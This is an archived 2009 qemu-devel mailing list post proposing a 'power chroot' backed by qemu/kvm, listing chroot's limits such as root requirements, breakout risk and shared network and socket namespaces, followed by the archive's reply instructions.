From: Liraz Siri <liraz@turnkeylinux.org>
To: qemu-devel@nongnu.org
Subject: [Qemu-devel] simulating a chroot-like interface with qemu
Date: Mon, 05 Jan 2009 17:05:31 +0200 [thread overview]
Message-ID: <496221BB.8010909@turnkeylinux.org> (raw)
I'd like to run by you guys an idea I've been playing around with.
We've recently cut down in our use of qemu/kvm in our development
toolchain for TurnKey Linux and instead switched to using chroot for
many things, mainly because it is lighter and easier to script which
translates into reduced overhead during development.
On the flip side there are many downsides to using chroot:
* requires root privileges. You can get around this by giving a program
suid privileges but that's dangerous because...
* root processes inside the chroot can easily break out
* processes inside the chroot share the network stack with processes
outside the chroot.
So for example, if mysql is running with the default configuration
inside a VM and binds to port 3306 that will work even if the host is
also running mysql listening to 3306. If you're using chroot there is
an additional overhead requiring you to reconfigure things.
* similarly, processes inside the chroot share the same abstract unix
socket namespace, which complicates some usage scenarios...
I'm thinking maybe for some uses it would be useful to simulate an
interface that looks and functions like chroot but is magically
implemented with qemu/kvm behind the scenes (e.g., separate kernel,
network stack, etc.). Sort of a power chroot that offers stronger
isolation/compartmentalization but with a similar unixish interface
(e.g., pipeable, scriptable, etc.)
Perhaps rather than mounting a block device, the guest could access its
root in the host filesystem transparently via a network filesystem of
some kind.
What do you think? Has anyone tried to use qemu to do something like
this before? Would it be difficult to implement?
Cheers,
Liraz
next reply other threads:[~2009-01-05 15:05 UTC|newest]
Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top
2009-01-05 15:05 Liraz Siri [this message]
2009-01-06 14:05 ` [Qemu-devel] simulating a chroot-like interface with qemu Avi Kivity
2009-01-06 15:17 ` Liraz Siri
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=496221BB.8010909@turnkeylinux.org \
--to=liraz@turnkeylinux.org \
--cc=qemu-devel@nongnu.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).